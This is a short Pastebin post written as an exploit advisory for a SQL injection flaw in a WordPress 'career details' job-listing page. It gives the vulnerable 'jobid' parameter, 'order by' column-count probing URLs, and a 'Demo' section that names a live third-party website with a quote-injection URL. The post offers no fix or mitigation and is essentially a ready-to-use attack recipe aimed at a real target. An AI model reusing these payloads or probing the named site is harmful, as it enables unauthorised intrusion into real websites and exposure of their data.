Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # [+] VULNERABILITY:
- #
- # Wordpress career Details Sql Injection Vulnerability
- #
- #######################################################
- #
- # [+] Exploit:
- #
- #http://localhost/[path]/career-details/?jobid=[ID]'[Sql Injection]
- #
- #######################################################
- #
- # [+] Proof:
- #
- #http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error
- #http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error
- #
- #######################################################
- #
- # [+] Demo:
- #
- #http://pragmasys.in/career-details-2/?jobid=7
- #
- #http://pragmasys.in/career-details-2/?jobid=7%27
- #
- #
- #######################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement